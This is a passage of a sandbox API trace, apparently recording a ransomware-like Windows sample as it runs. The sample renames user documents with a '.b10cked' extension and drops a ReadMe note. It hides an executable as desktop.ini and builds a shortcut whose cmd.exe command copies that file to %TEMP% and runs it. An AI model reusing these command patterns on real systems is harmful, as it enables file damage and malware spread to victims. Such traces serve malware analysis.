lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x4295 [0133.924] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4292, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4292, lpOverlapped=0x0) returned 1 [0133.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tq3yPk_6C.docx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0133.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tq3yPk_6C.docx", cchWideChar=14, lpMultiByteStr=0x131326c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tq3yPk_6C.docx", lpUsedDefaultChar=0x0) returned 14 [0133.929] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x8527 [0133.929] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0133.929] CloseHandle (hObject=0x114) returned 1 [0133.930] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\Tq3yPk_6C.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC") returned 0x33 [0133.931] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\") returned 0x27 [0133.931] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC\" 
\"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xc4c, dwThreadId=0xb70)) returned 1 [0133.933] CloseHandle (hObject=0x110) returned 1 [0133.933] CloseHandle (hObject=0x114) returned 1 [0133.933] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0133.933] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0133.933] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount1=46, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount2=41) returned 1 [0133.933] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0133.933] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0133.933] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", 
cchCount1=46, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0133.933] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0133.933] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0133.933] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0133.933] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\") returned 0x27 [0133.933] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0133.934] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0133.934] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > 
\"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xb90, dwThreadId=0xb9c)) returned 1 [0134.045] CloseHandle (hObject=0x110) returned 1 [0134.045] CloseHandle (hObject=0x114) returned 1 [0134.045] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\bl0cked-readme.rtf")) returned 0xffffffff [0134.045] GetLastError () returned 0x2 [0134.045] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0134.150] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\bl0cked-readme.rtf")) returned 0x20 [0134.151] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0134.151] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0134.151] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0134.151] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0134.151] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0134.151] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type 
\"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0134.151] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0134.151] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\") returned 0x27 [0134.152] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0134.152] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0134.152] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1") returned 0x26 [0134.152] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x156 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHT~1\\DESKTOP.INI\" & DEL /F /Q 
\"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHT~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHT~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHT~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x156 [0134.152] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0134.152] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xc10, dwThreadId=0xafc)) returned 1 [0134.218] 
WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0134.882] CloseHandle (hObject=0x114) returned 1 [0134.882] CloseHandle (hObject=0x110) returned 1 [0134.883] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0134.883] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0134.883] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0134.883] GetTickCount () returned 0x2abc8 [0134.883] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=19167215143) returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x32\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x63\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x46\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x50\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6b\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x37\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0134.883] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0134.883] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0134.883] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0134.883] CharUpperBuffW (in: lpsz="explorer.exe \"ftTfHtfADyQIa-_\" & type \"ftTfHtfADyQIa-_\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6f | out: lpsz="EXPLORER.EXE \"FTTFHTFADYQIA-_\" & TYPE \"FTTFHTFADYQIA-_\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6f [0134.883] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0134.883] CharUpperBuffW (in: lpsz="explorer.exe \"ftTfHtfADyQIa-_\" & type \"ftTfHtfADyQIa-_\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x70 | out: lpsz="EXPLORER.EXE \"FTTFHTFADYQIA-_\" & TYPE \"FTTFHTFADYQIA-_\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 
0x70 [0134.883] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0134.883] CoInitialize (pvReserved=0x0) returned 0x0 [0134.884] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0134.885] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0134.885] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0134.886] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0134.888] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"ftTfHtfADyQIa-_\" & type \"ftTfHtfADyQIa-_\\desktop.ini\" > \"%TEMP%\\L2cFPkj7.exe\" && \"%TEMP%\\L2cFPkj7.exe\"") returned 0x0 [0134.888] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0134.888] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0134.888] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0134.888] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_.lnk", fRemember=0) returned 0x0 [0134.897] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0134.897] ShellLink:IUnknown:Release 
(This=0x1d3df0) returned 0x1 [0134.897] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0134.897] CoUninitialize () [0134.898] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.898] ReleaseMutex (hMutex=0xf8) returned 1 [0134.898] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.898] ReleaseMutex (hMutex=0xf8) returned 1 [0134.898] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.898] ReleaseMutex (hMutex=0xf8) returned 1 [0134.898] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.898] ReleaseMutex (hMutex=0xf8) returned 1 [0134.898] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\-V83XFbt5-FsW.docx" (normalized: "c:\\users\\eebsym5\\documents\\-v83xfbt5-fsw.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0134.898] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.898] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.898] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.898] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19168752388) returned 1 [0134.898] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.898] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.898] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1c6b [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.899] 
